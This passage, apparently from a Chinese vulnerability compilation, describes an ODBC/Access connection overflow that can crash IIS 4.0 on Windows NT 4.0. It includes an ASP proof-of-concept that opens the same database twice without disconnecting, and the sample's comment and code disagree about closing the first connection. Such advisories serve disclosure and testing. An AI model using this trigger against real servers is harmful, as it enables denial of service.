Data Type: REG_DWORD 设置为十进制 具体数值设置为你想设定的IIS允许接受的URL最大长度。
18、MS ODBC数据库连接溢出导致NT/9x拒绝服务攻击
漏洞描述:
Microsoft ODBC数据库在连接和断开时可能存在潜在的溢出问题(Microsoft ACCESS数据库相关)。 如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。
影响系统:
ODBC 版本: 3.510.3711.0 ODBC Access驱动版本: 3.51.1029.00 OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386) Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)
漏洞检测方法如下:
ODBC 连接源名称: miscdb ODBC 数据库型号: MS Access ODBC 假设路径: d:\data\misc.mdb
<html> <body> ...lots of html removed... <!-- We Connect to DB1 --> <% set connGlobal = server.createobject("ADODB.Connection") connGlobal.Open "DSN=miscdb;User=sa" mSQL = "arb SQL Statement" set rsGlobal = connGlobal.execute(mSQL) While not rsGlobal.eof Response.Write rsGlobal("resultfrommiscdb") rsGlobal.movenext wend rsGlobal.close set rsGlobal = nothing connGlobal.close set connGlobal = nothing Note we do NOT close the connection %>
<!-- Call the same database by means of DBQ direct file access --> <% set connGlobal = server.createobject("ADODB.Connection") connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=d:\data\misc.mdb" mSQL = "arb SQL Statement" set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof Response.Write rsGlobal("resultfrommiscdb") rsGlobal.movenext wend rsGlobal.close set rsGlobal = nothing connGlobal.close set connGlobal = nothing Note we DO close the connection %>
精品推荐